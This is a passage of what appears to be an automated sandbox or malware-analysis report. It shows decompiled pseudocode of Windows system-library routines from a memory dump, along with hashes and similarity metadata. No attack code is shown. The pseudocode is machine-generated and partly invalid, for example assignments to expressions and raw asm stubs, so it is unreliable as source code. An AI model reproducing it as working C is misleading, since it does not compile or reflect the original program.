                                                              				signed int _t82;
                                                              				intOrPtr _t83;
                                                              				void* _t87;
                                                              				char _t88;
                                                              				intOrPtr* _t89;
                                                              				intOrPtr _t91;
                                                              				void* _t97;
                                                              				intOrPtr _t100;
                                                              				void* _t102;
                                                              				void* _t107;
                                                              				signed int _t108;
                                                              				intOrPtr* _t112;
                                                              				void* _t113;
                                                              				intOrPtr* _t114;
                                                              				intOrPtr _t115;
                                                              				intOrPtr _t116;
                                                              				intOrPtr _t117;
                                                              				signed int _t118;
                                                              				void* _t130;
                                                              
                                                              				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                                                              				_v8 =  *0x10dd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                                                              				_t112 = __ecx;
                                                              				_v77 = __edx;
                                                              				_v48 = __ecx;
                                                              				_v28 = 0;
                                                              				_t5 = _t112 + 0xc; // 0x575651ff
                                                              				_t105 =  *_t5;
                                                              				_v20 = 0;
                                                              				_v16 = 0;
                                                              				if(_t105 == 0) {
                                                              					_t50 = _t112 + 4; // 0x5de58b5b
                                                              					_t60 =  *__ecx |  *_t50;
                                                              					if(( *__ecx |  *_t50) != 0) {
                                                              						 *__ecx = 0;
                                                              						__ecx[1] = 0;
                                                              						if(E01007D50() != 0) {
                                                              							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                              						} else {
                                                              							_t65 = 0x7ffe0386;
                                                              						}
                                                              						if( *_t65 != 0) {
                                                              							E010B8CD6(_t112);
                                                              						}
                                                              						_push(0);
                                                              						_t52 = _t112 + 0x10; // 0x778df98b
                                                              						_push( *_t52);
                                                              						_t60 = E01029E20();
                                                              					}
                                                              					L20:
                                                              					_pop(_t107);
                                                              					_pop(_t113);
                                                              					_pop(_t87);
                                                              					return E0102B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                                                              				}
                                                              				_t8 = _t112 + 8; // 0x8b000cc2
                                                              				_t67 =  *_t8;
                                                              				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                                                              				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                                                              				_t108 =  *(_t67 + 0x14);
                                                              				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                                                              				_t105 = 0x2710;
                                                              				asm("sbb eax, edi");
                                                              				_v44 = _t88;
                                                              				_v52 = _t108;
                                                              				_t60 = E0102CE00(_t97, _t68, 0x2710, 0);
                                                              				_v56 = _t60;
                                                              				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                                                              					L3:
                                                              					 *(_t112 + 0x44) = _t60;
                                                              					_t105 = _t60 * 0x2710 >> 0x20;
                                                              					 *_t112 = _t88;
                                                              					 *(_t112 + 4) = _t108;
                                                              					_v20 = _t60 * 0x2710;
                                                              					_v16 = _t60 * 0x2710 >> 0x20;
                                                              					if(_v77 != 0) {
                                                              						L16:
                                                              						_v36 = _t88;
                                                              						_v32 = _t108;
                                                              						if(E01007D50() != 0) {
                                                              							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                              						} else {
                                                              							_t73 = 0x7ffe0386;
                                                              						}
                                                              						if( *_t73 != 0) {
                                                              							_t105 = _v40;
                                                              							E010B8F6A(_t112, _v40, _t88, _t108);
                                                              						}
                                                              						_push( &_v28);
                                                              						_push(0);
                                                              						_push( &_v36);
                                                              						_t48 = _t112 + 0x10; // 0x778df98b
                                                              						_push( *_t48);
                                                              						_t60 = E0102AF60();
                                                              						goto L20;
                                                              					} else {
                                                              						_t89 = 0x7ffe03b0;
                                                              						do {
                                                              							_t114 = 0x7ffe0010;
                                                              							do {
                                                              								_t77 =  *0x10d8628; // 0x0
                                                              								_v68 = _t77;
                                                              								_t78 =  *0x10d862c; // 0x0
                                                              								_v64 = _t78;
                                                              								_v72 =  *_t89;
                                                              								_v76 =  *((intOrPtr*)(_t89 + 4));
                                                              								while(1) {
                                                              									_t105 =  *0x7ffe000c;
                                                              									_t100 =  *0x7ffe0008;
                                                              									if(_t105 ==  *_t114) {
                                                              										goto L8;
                                                              									}
                                                              									asm("pause");
                                                              								}
                                                              								L8:
                                                              								_t89 = 0x7ffe03b0;
                                                              								_t115 =  *0x7ffe03b0;
                                                              								_t82 =  *0x7FFE03B4;
                                                              								_v60 = _t115;
                                                              								_t114 = 0x7ffe0010;
                                                              								_v56 = _t82;
                                                              							} while (_v72 != _t115 || _v76 != _t82);
                                                              							_t83 =  *0x10d8628; // 0x0
                                                              							_t116 =  *0x10d862c; // 0x0
                                                              							_v76 = _t116;
                                                              							_t117 = _v68;
                                                              						} while (_t117 != _t83 || _v64 != _v76);
                                                              						asm("sbb edx, [esp+0x24]");
                                                              						_t102 = _t100 - _v60 - _t117;
                                                              						_t112 = _v48;
                                                              						_t91 = _v44;
                                                              						asm("sbb edx, eax");
                                                              						_t130 = _t105 - _v52;
                                                              						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                                                              							_t88 = _t102 - _t91;
                                                              							asm("sbb edx, edi");
                                                              							_t108 = _t105;
                                                              						} else {
                                                              							_t88 = 0;
                                                              							_t108 = 0;
                                                              						}
                                                              						goto L16;
                                                              					}
                                                              				} else {
                                                              					if( *(_t112 + 0x44) == _t60) {
                                                              						goto L20;
                                                              					}
                                                              					goto L3;
                                                              				}
                                                              			}

                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0100B9A5
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID:
                                                              • API String ID: 885266447-0
                                                              • Opcode ID: 901157f6889ccdb7074be568850ac79e3644e97e4f966d820bba2c0a64d5a5cf
                                                              • Instruction ID: d3b2efc54865fe87708270c9f371d02c2dec173c6a7fff52a2a66bd7aa80037b
                                                              • Opcode Fuzzy Hash: 901157f6889ccdb7074be568850ac79e3644e97e4f966d820bba2c0a64d5a5cf
                                                              • Instruction Fuzzy Hash: C6517775A08701CFE762CF6CC08092BBBE5FB88610F1489AEE9D587395D771E840CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 78%
                                                              			E00FEB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                                                              				signed int _t65;
                                                              				signed short _t69;
                                                              				intOrPtr _t70;
                                                              				signed short _t85;
                                                              				void* _t86;
                                                              				signed short _t89;
                                                              				signed short _t91;
                                                              				intOrPtr _t92;
                                                              				intOrPtr _t97;
                                                              				intOrPtr* _t98;
                                                              				signed short _t99;
                                                              				signed short _t101;
                                                              				void* _t102;
                                                              				char* _t103;
                                                              				signed short _t104;
                                                              				intOrPtr* _t110;
                                                              				void* _t111;
                                                              				void* _t114;
                                                              				intOrPtr* _t115;
                                                              
                                                              				_t109 = __esi;
                                                              				_t108 = __edi;
                                                              				_t106 = __edx;
                                                              				_t95 = __ebx;
                                                              				_push(0x90);
                                                              				_push(0x10bf7a8);
                                                              				E0103D0E8(__ebx, __edi, __esi);
                                                              				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                                                              				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                                                              				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                                                              				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                                                              				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                                                              				if(__edx == 0xffffffff) {
                                                              					L6:
                                                              					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                                                              					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                                                              					__eflags = _t65 & 0x00000002;
                                                              					if((_t65 & 0x00000002) != 0) {
                                                              						L3:
                                                              						L4:
                                                              						return E0103D130(_t95, _t108, _t109);
                                                              					}
                                                              					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                                                              					_t108 = 0;
                                                              					_t109 = 0;
                                                              					_t95 = 0;
                                                              					__eflags = 0;
                                                              					while(1) {
                                                              						__eflags = _t95 - 0x200;
                                                              						if(_t95 >= 0x200) {
                                                              							break;
                                                              						}
                                                              						E0102D000(0x80);
                                                              						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                                                              						_t108 = _t115;
                                                              						_t95 = _t95 - 0xffffff80;
                                                              						_t17 = _t114 - 4;
                                                              						 *_t17 =  *(_t114 - 4) & 0x00000000;
                                                              						__eflags =  *_t17;
                                                              						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                                                              						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                                                              						_t102 = _t110 + 1;
                                                              						do {
                                                              							_t85 =  *_t110;
                                                              							_t110 = _t110 + 1;
                                                              							__eflags = _t85;
                                                              						} while (_t85 != 0);
                                                              						_t111 = _t110 - _t102;
                                                              						_t21 = _t95 - 1; // -129
                                                              						_t86 = _t21;
                                                              						__eflags = _t111 - _t86;
                                                              						if(_t111 > _t86) {
                                                              							_t111 = _t86;
                                                              						}
                                                              						E0102F3E0(_t108, _t106, _t111);
                                                              						_t115 = _t115 + 0xc;
                                                              						_t103 = _t111 + _t108;
                                                              						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                                                              						_t89 = _t95 - _t111;
                                                              						__eflags = _t89;
                                                              						_push(0);
                                                              						if(_t89 == 0) {
                                                              							L15:
                                                              							_t109 = 0xc000000d;
                                                              							goto L16;
                                                              						} else {
                                                              							__eflags = _t89 - 0x7fffffff;
                                                              							if(_t89 <= 0x7fffffff) {
                                                              								L16:
                                                              								 *(_t114 - 0x94) = _t109;
                                                              								__eflags = _t109;
                                                              								if(_t109 < 0) {
                                                              									__eflags = _t89;
                                                              									if(_t89 != 0) {
                                                              										 *_t103 = 0;
                                                              									}
                                                              									L26:
                                                              									 *(_t114 - 0xa0) = _t109;
                                                              									 *(_t114 - 4) = 0xfffffffe;
                                                              									__eflags = _t109;
                                                              									if(_t109 >= 0) {
                                                              										L31:
                                                              										_t98 = _t108;
                                                              										_t39 = _t98 + 1; // 0x1
                                                              										_t106 = _t39;
                                                              										do {
                                                              											_t69 =  *_t98;
                                                              											_t98 = _t98 + 1;
                                                              											__eflags = _t69;
                                                              										} while (_t69 != 0);
                                                              										_t99 = _t98 - _t106;
                                                              										__eflags = _t99;
                                                              										L34:
                                                              										_t70 =  *[fs:0x30];
                                                              										__eflags =  *((char*)(_t70 + 2));
                                                              										if( *((char*)(_t70 + 2)) != 0) {
                                                              											L40:
                                                              											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                                                              											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                                                              											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                                                              											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                                                              											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                                                              											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                                                              											 *(_t114 - 4) = 1;
                                                              											_push(_t114 - 0x74);
                                                              											L0103DEF0(_t99, _t106);
                                                              											 *(_t114 - 4) = 0xfffffffe;
                                                              											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                              											goto L3;
                                                              										}
                                                              										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                                                              										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                                                              											goto L40;
                                                              										}
                                                              										_push( *((intOrPtr*)(_t114 + 8)));
                                                              										_push( *((intOrPtr*)(_t114 - 0x9c)));
                                                              										_push(_t99 & 0x0000ffff);
                                                              										_push(_t108);
                                                              										_push(1);
                                                              										_t101 = E0102B280();
                                                              										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                                                              										if( *((char*)(_t114 + 0x14)) == 1) {
                                                              											__eflags = _t101 - 0x80000003;
                                                              											if(_t101 == 0x80000003) {
                                                              												E0102B7E0(1);
                                                              												_t101 = 0;
                                                              												__eflags = 0;
                                                              											}
                                                              										}
                                                              										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                              										goto L4;
                                                              									}
                                                              									__eflags = _t109 - 0x80000005;
                                                              									if(_t109 == 0x80000005) {
                                                              										continue;
                                                              									}
                                                              									break;
                                                              								}
                                                              								 *(_t114 - 0x90) = 0;
                                                              								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                                                              								_t91 = E0102E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                                                              								_t115 = _t115 + 0x10;
                                                              								_t104 = _t91;
                                                              								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                                                              								__eflags = _t104;
                                                              								if(_t104 < 0) {
                                                              									L21:
                                                              									_t109 = 0x80000005;
                                                              									 *(_t114 - 0x90) = 0x80000005;
                                                              									L22:
                                                              									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                                                              									L23:
                                                              									 *(_t114 - 0x94) = _t109;
                                                              									goto L26;
                                                              								}
                                                              								__eflags = _t104 - _t92;
                                                              								if(__eflags > 0) {
                                                              									goto L21;
                                                              								}
                                                              								if(__eflags == 0) {
                                                              									goto L22;
                                                              								}
                                                              								goto L23;
                                                              							}
                                                              							goto L15;
                                                              						}
                                                              					}
                                                              					__eflags = _t109;
                                                              					if(_t109 >= 0) {
                                                              						goto L31;
                                                              					}
                                                              					__eflags = _t109 - 0x80000005;
                                                              					if(_t109 != 0x80000005) {
                                                              						goto L31;
                                                              					}
                                                              					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                                                              					_t38 = _t95 - 1; // -129
                                                              					_t99 = _t38;
                                                              					goto L34;
                                                              				}
                                                              				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                              					__eflags = __edx - 0x65;
                                                              					if(__edx != 0x65) {
                                                              						goto L2;
                                                              					}
                                                              					goto L6;
                                                              				}
                                                              				L2:
                                                              				_push( *((intOrPtr*)(_t114 + 8)));
                                                              				_push(_t106);
                                                              				if(E0102A890() != 0) {
                                                              					goto L6;
                                                              				}
                                                              				goto L3;
                                                              			}























                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID: _vswprintf_s
                                                              • String ID:
                                                              • API String ID: 677850445-0
                                                              • Opcode ID: e346a7ca70ff01a1c50556dfe842666dd085ca19d6d0a65f7a4934cc806d6810
                                                              • Instruction ID: 4acca2f3dfe0f84f097eef1dd9c31b29ab7f904f08ccaccfe8415c9ac5a8e1fd
                                                              • Opcode Fuzzy Hash: e346a7ca70ff01a1c50556dfe842666dd085ca19d6d0a65f7a4934cc806d6810
                                                              • Instruction Fuzzy Hash: 2A51C1B5D0025A8BEB21CF688885BAEBBF0BF00714F2041BDD899EB282D7754D45DB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 84%
                                                              			E01012581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1546911997) {
                                                              				signed int _v8;
                                                              				signed int _v16;
                                                              				unsigned int _v24;
                                                              				void* _v28;
                                                              				signed int _v32;
                                                              				unsigned int _v36;
                                                              				void* _v37;
                                                              				signed int _v40;
                                                              				signed int _v44;
                                                              				signed int _v48;
                                                              				signed int _v52;
                                                              				signed int _v56;
                                                              				intOrPtr _v60;
                                                              				signed int _v64;
                                                              				signed int _v68;
                                                              				signed int _v72;
                                                              				signed int _v76;
                                                              				signed int _v80;
                                                              				signed int _t233;
                                                              				signed int _t237;
                                                              				void* _t238;
                                                              				void* _t239;
                                                              				signed int _t243;
                                                              				signed int _t245;
                                                              				intOrPtr _t247;
                                                              				signed int _t250;
                                                              				signed int _t257;
                                                              				signed int _t260;
                                                              				signed int _t268;
                                                              				intOrPtr _t274;
                                                              				signed int _t276;
                                                              				signed int _t278;
                                                              				void* _t279;
                                                              				signed int _t280;
                                                              				unsigned int _t283;
                                                              				signed int _t287;
                                                              				intOrPtr* _t288;
                                                              				signed int _t289;
                                                              				signed int _t293;
                                                              				intOrPtr _t305;
                                                              				signed int _t314;
                                                              				signed int _t316;
                                                              				signed int _t317;
                                                              				signed int _t321;
                                                              				signed int _t322;
                                                              				void* _t324;
                                                              				signed int _t325;
                                                              				signed int _t327;
                                                              				signed int _t330;
                                                              				void* _t331;
                                                              				void* _t333;
                                                              
                                                              				_t327 = _t330;
                                                              				_t331 = _t330 - 0x4c;
                                                              				_v8 =  *0x10dd360 ^ _t327;
                                                              				_push(__ebx);
                                                              				_push(__esi);
                                                              				_push(__edi);
                                                              				_t321 = 0x10db2e8;
                                                              				_v56 = _a4;
                                                              				_v48 = __edx;
                                                              				_v60 = __ecx;
                                                              				_t283 = 0;
                                                              				_v80 = 0;
                                                              				asm("movsd");
                                                              				_v64 = 0;
                                                              				_v76 = 0;
                                                              				_v72 = 0;
                                                              				asm("movsd");
                                                              				_v44 = 0;
                                                              				_v52 = 0;
                                                              				_v68 = 0;
                                                              				asm("movsd");
                                                              				_v32 = 0;
                                                              				_v36 = 0;
                                                              				asm("movsd");
                                                              				_v16 = 0;
                                                              				_t333 = (_v24 >> 0x0000001c & 0x00000003) - 1;
                                                              				_t274 = 0x48;
                                                              				_t303 = 0 | _t333 == 0x00000000;
                                                              				_t314 = 0;
                                                              				_v37 = _t333 == 0;
                                                              				if(_v48 <= 0) {
                                                              					L16:
                                                              					_t45 = _t274 - 0x48; // 0x0
                                                              					__eflags = _t45 - 0xfffe;
                                                              					if(_t45 > 0xfffe) {
                                                              						_t322 = 0xc0000106;
                                                              						goto L32;
                                                              					} else {
                                                              						_t321 = L01004620(_t283,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t274);
                                                              						_v52 = _t321;
                                                              						__eflags = _t321;
                                                              						if(_t321 == 0) {
                                                              							_t322 = 0xc0000017;
                                                              							goto L32;
                                                              						} else {
                                                              							 *(_t321 + 0x44) =  *(_t321 + 0x44) & 0x00000000;
                                                              							_t50 = _t321 + 0x48; // 0x48
                                                              							_t316 = _t50;
                                                              							_t303 = _v32;
                                                              							 *((intOrPtr*)(_t321 + 0x3c)) = _t274;
                                                              							_t276 = 0;
                                                              							 *((short*)(_t321 + 0x30)) = _v48;
                                                              							__eflags = _t303;
                                                              							if(_t303 != 0) {
                                                              								 *(_t321 + 0x18) = _t316;
                                                              								__eflags = _t303 - 0x10d8478;
                                                              								 *_t321 = ((0 | _t303 == 0x010d8478) - 0x00000001 & 0xfffffffb) + 7;
                                                              								E0102F3E0(_t316,  *((intOrPtr*)(_t303 + 4)),  *_t303 & 0x0000ffff);
                                                              								_t303 = _v32;
                                                              								_t331 = _t331 + 0xc;
                                                              								_t276 = 1;
                                                              								__eflags = _a8;
                                                              								_t316 = _t316 + (( *_t303 & 0x0000ffff) >> 1) * 2;
                                                              								if(_a8 != 0) {
                                                              									_t268 = E010739F2(_t316);
                                                              									_t303 = _v32;
                                                              									_t316 = _t268;
                                                              								}
                                                              							}
                                                              							_t287 = 0;
                                                              							_v16 = 0;
                                                              							__eflags = _v48;
                                                              							if(_v48 <= 0) {
                                                              								L31:
                                                              								_t322 = _v68;
                                                              								__eflags = 0;
                                                              								 *((short*)(_t316 - 2)) = 0;
                                                              								goto L32;
                                                              							} else {
                                                              								_t278 = _t321 + _t276 * 4;
                                                              								_v56 = _t278;
                                                              								do {
                                                              									__eflags = _t303;
                                                              									if(_t303 != 0) {
                                                              										_t233 =  *(_v60 + _t287 * 4);
                                                              										__eflags = _t233;
                                                              										if(_t233 == 0) {
                                                              											goto L30;
                                                              										} else {
                                                              											__eflags = _t233 == 5;
                                                              											if(_t233 == 5) {
                                                              												goto L30;
                                                              											} else {
                                                              												goto L22;
                                                              											}
                                                              										}
                                                              									} else {
                                                              										L22:
                                                              										 *_t278 =  *(_v60 + _t287 * 4);
                                                              										 *(_t278 + 0x18) = _t316;
                                                              										_t237 =  *(_v60 + _t287 * 4);
                                                              										__eflags = _t237 - 8;
                                                              										if(_t237 > 8) {
                                                              											goto L56;
                                                              										} else {
                                                              											switch( *((intOrPtr*)(_t237 * 4 +  &M01012959))) {
                                                              												case 0:
                                                              													__ax =  *0x10d8488;
                                                              													__eflags = __ax;
                                                              													if(__ax == 0) {
                                                              														goto L29;
                                                              													} else {
                                                              														__ax & 0x0000ffff = E0102F3E0(__edi,  *0x10d848c, __ax & 0x0000ffff);
                                                              														__eax =  *0x10d8488 & 0x0000ffff;
                                                              														goto L26;
                                                              													}
                                                              													goto L108;
                                                              												case 1:
                                                              													L45:
                                                              													E0102F3E0(_t316, _v80, _v64);
                                                              													_t263 = _v64;
                                                              													goto L26;
                                                              												case 2:
                                                              													 *0x10d8480 & 0x0000ffff = E0102F3E0(__edi,  *0x10d8484,  *0x10d8480 & 0x0000ffff);
                                                              													__eax =  *0x10d8480 & 0x0000ffff;
                                                              													__eax = ( *0x10d8480 & 0x0000ffff) >> 1;
                                                              													__edi = __edi + __eax * 2;
                                                              													goto L28;
                                                              												case 3:
                                                              													__eax = _v44;
                                                              													__eflags = __eax;
                                                              													if(__eax == 0) {
                                                              														goto L29;
                                                              													} else {
                                                              														__esi = __eax + __eax;
                                                              														__eax = E0102F3E0(__edi, _v72, __esi);
                                                              														__edi = __edi + __esi;
                                                              														__esi = _v52;
                                                              														goto L27;
                                                              													}
                                                              													goto L108;
                                                              												case 4:
                                                              													_push(0x2e);
                                                              													_pop(__eax);
                                                              													 *(__esi + 0x44) = __edi;
                                                              													 *__edi = __ax;
                                                              													__edi = __edi + 4;
                                                              													_push(0x3b);
                                                              													_pop(__eax);
                                                              													 *(__edi - 2) = __ax;
                                                              													goto L29;
                                                              												case 5:
                                                              													__eflags = _v36;
                                                              													if(_v36 == 0) {
                                                              														goto L45;
                                                              													} else {
                                                              														E0102F3E0(_t316, _v76, _v36);
                                                              														_t263 = _v36;
                                                              													}
                                                              													L26:
                                                              													_t331 = _t331 + 0xc;
                                                              													_t316 = _t316 + (_t263 >> 1) * 2 + 2;
                                                              													__eflags = _t316;
                                                              													L27:
                                                              													_push(0x3b);
                                                              													_pop(_t265);
                                                              													 *((short*)(_t316 - 2)) = _t265;
                                                              													goto L28;
                                                              												case 6:
                                                              													__ebx =  *0x10d575c;
                                                              													__eflags = __ebx - 0x10d575c;
                                                              													if(__ebx != 0x10d575c) {
                                                              														_push(0x3b);
                                                              														_pop(__esi);
                                                              														do {
                                                              															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
                                                              															E0102F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
                                                              															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                                                              															__edi = __edi + __eax * 2;
                                                              															__edi = __edi + 2;
                                                              															 *(__edi - 2) = __si;
                                                              															__ebx =  *__ebx;
                                                              															__eflags = __ebx - 0x10d575c;
                                                              														} while (__ebx != 0x10d575c);
                                                              														__esi = _v52;
                                                              														__ecx = _v16;
                                                              														__edx = _v32;
                                                              													}
                                                              													__ebx = _v56;
                                                              													goto L29;
                                                              												case 7:
                                                              													 *0x10d8478 & 0x0000ffff = E0102F3E0(__edi,  *0x10d847c,  *0x10d8478 & 0x0000ffff);
                                                              													__eax =  *0x10d8478 & 0x0000ffff;
                                                              													__eax = ( *0x10d8478 & 0x0000ffff) >> 1;
                                                              													__eflags = _a8;
                                                              													__edi = __edi + __eax * 2;
                                                              													if(_a8 != 0) {
                                                              														__ecx = __edi;
                                                              														__eax = E010739F2(__ecx);
                                                              														__edi = __eax;
                                                              													}
                                                              													goto L28;
                                                              												case 8:
                                                              													__eax = 0;
                                                              													 *(__edi - 2) = __ax;
                                                              													 *0x10d6e58 & 0x0000ffff = E0102F3E0(__edi,  *0x10d6e5c,  *0x10d6e58 & 0x0000ffff);
                                                              													 *(__esi + 0x38) = __edi;
                                                              													__eax =  *0x10d6e58 & 0x0000ffff;
                                                              													__eax = ( *0x10d6e58 & 0x0000ffff) >> 1;
                                                              													__edi = __edi + __eax * 2;
                                                              													__edi = __edi + 2;
                                                              													L28:
                                                              													_t287 = _v16;
                                                              													_t303 = _v32;
                                                              													L29:
                                                              													_t278 = _t278 + 4;
                                                              													__eflags = _t278;
                                                              													_v56 = _t278;
                                                              													goto L30;
                                                              											}
                                                              										}
                                                              									}
                                                              									goto L108;
                                                              									L30:
                                                              									_t287 = _t287 + 1;
                                                              									_v16 = _t287;
                                                              									__eflags = _t287 - _v48;
                                                              								} while (_t287 < _v48);
                                                              								goto L31;
                                                              							}
                                                              						}
                                                              					}
                                                              				} else {
                                                              					while(1) {
                                                              						L1:
                                                              						_t237 =  *(_v60 + _t314 * 4);
                                                              						if(_t237 > 8) {
                                                              							break;
                                                              						}
                                                              						switch( *((intOrPtr*)(_t237 * 4 +  &M01012935))) {
                                                              							case 0:
                                                              								__ax =  *0x10d8488;
                                                              								__eflags = __ax;
                                                              								if(__ax != 0) {
                                                              									__eax = __ax & 0x0000ffff;
                                                              									__ebx = __ebx + 2;
                                                              									__eflags = __ebx;
                                                              									goto L53;
                                                              								}
                                                              								goto L14;
                                                              							case 1:
                                                              								L44:
                                                              								_t303 =  &_v64;
                                                              								_v80 = E01012E3E(0,  &_v64);
                                                              								_t274 = _t274 + _v64 + 2;
                                                              								goto L13;
                                                              							case 2:
                                                              								__eax =  *0x10d8480 & 0x0000ffff;
                                                              								__ebx = __ebx + __eax;
                                                              								__eflags = __dl;
                                                              								if(__dl != 0) {
                                                              									__eax = 0x10d8480;
                                                              									goto L80;
                                                              								}
                                                              								goto L14;
                                                              							case 3:
                                                              								__eax = E00FFEEF0(0x10d79a0);
                                                              								__eax =  &_v44;
                                                              								_push(__eax);
                                                              								_push(0);
                                                              								_push(0);
                                                              								_push(4);
                                                              								_push(L"PATH");
                                                              								_push(0);
                                                              								L57();
                                                              								__esi = __eax;
                                                              								_v68 = __esi;
                                                              								__eflags = __esi - 0xc0000023;
                                                              								if(__esi != 0xc0000023) {
                                                              									L10:
                                                              									__eax = E00FFEB70(__ecx, 0x10d79a0);
                                                              									__eflags = __esi - 0xc0000100;
                                                              									if(__esi == 0xc0000100) {
                                                              										_v44 = _v44 & 0x00000000;
                                                              										__eax = 0;
                                                              										_v68 = 0;
                                                              										goto L13;
                                                              									} else {
                                                              										__eflags = __esi;
                                                              										if(__esi < 0) {
                                                              											L32:
                                                              											_t211 = _v72;
                                                              											__eflags = _t211;
                                                              											if(_t211 != 0) {
                                                              												L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t211);
                                                              											}
                                                              											_t212 = _v52;
                                                              											__eflags = _t212;
                                                              											if(_t212 != 0) {
                                                              												__eflags = _t322;
                                                              												if(_t322 < 0) {
                                                              													L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t212);
                                                              													_t212 = 0;
                                                              												}
                                                              											}
                                                              											goto L36;
                                                              										} else {
                                                              											__eax = _v44;
                                                              											__ebx = __ebx + __eax * 2;
                                                              											__ebx = __ebx + 2;
                                                              											__eflags = __ebx;
                                                              											L13:
                                                              											_t283 = _v36;
                                                              											goto L14;
                                                              										}
                                                              									}
                                                              								} else {
                                                              									__eax = _v44;
                                                              									__ecx =  *0x10d7b9c; // 0x0
                                                              									_v44 + _v44 =  *[fs:0x30];
                                                              									__ecx = __ecx + 0x180000;
                                                              									__eax = L01004620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                                                              									_v72 = __eax;
                                                              									__eflags = __eax;
                                                              									if(__eax == 0) {
                                                              										__eax = E00FFEB70(__ecx, 0x10d79a0);
                                                              										__eax = _v52;
                                                              										L36:
                                                              										_pop(_t315);
                                                              										_pop(_t323);
                                                              										__eflags = _v8 ^ _t327;
                                                              										_pop(_t275);
                                                              										return E0102B640(_t212, _t275, _v8 ^ _t327, _t303, _t315, _t323);
                                                              									} else {
                                                              										__ecx =  &_v44;
                                                              										_push(__ecx);
                                                              										_push(_v44);
                                                              										_push(__eax);
                                                              										_push(4);
                                                              										_push(L"PATH");
                                                              										_push(0);
                                                              										L57();
                                                              										__esi = __eax;
                                                              										_v68 = __eax;
                                                              										goto L10;
                                                              									}
                                                              								}
                                                              								goto L108;
                                                              							case 4:
                                                              								__ebx = __ebx + 4;
                                                              								goto L14;
                                                              							case 5:
                                                              								_t270 = _v56;
                                                              								if(_v56 != 0) {
                                                              									_t303 =  &_v36;
                                                              									_t272 = E01012E3E(_t270,  &_v36);
                                                              									_t283 = _v36;
                                                              									_v76 = _t272;
                                                              								}
                                                              								if(_t283 == 0) {
                                                              									goto L44;
                                                              								} else {
                                                              									_t274 = _t274 + 2 + _t283;
                                                              								}
                                                              								goto L14;
                                                              							case 6:
                                                              								__eax =  *0x10d5764 & 0x0000ffff;
                                                              								goto L53;
                                                              							case 7:
                                                              								__eax =  *0x10d8478 & 0x0000ffff;
                                                              								__ebx = __ebx + __eax;
                                                              								__eflags = _a8;
                                                              								if(_a8 != 0) {
                                                              									__ebx = __ebx + 0x16;
                                                              									__ebx = __ebx + __eax;
                                                              								}
                                                              								__eflags = __dl;
                                                              								if(__dl != 0) {
                                                              									__eax = 0x10d8478;
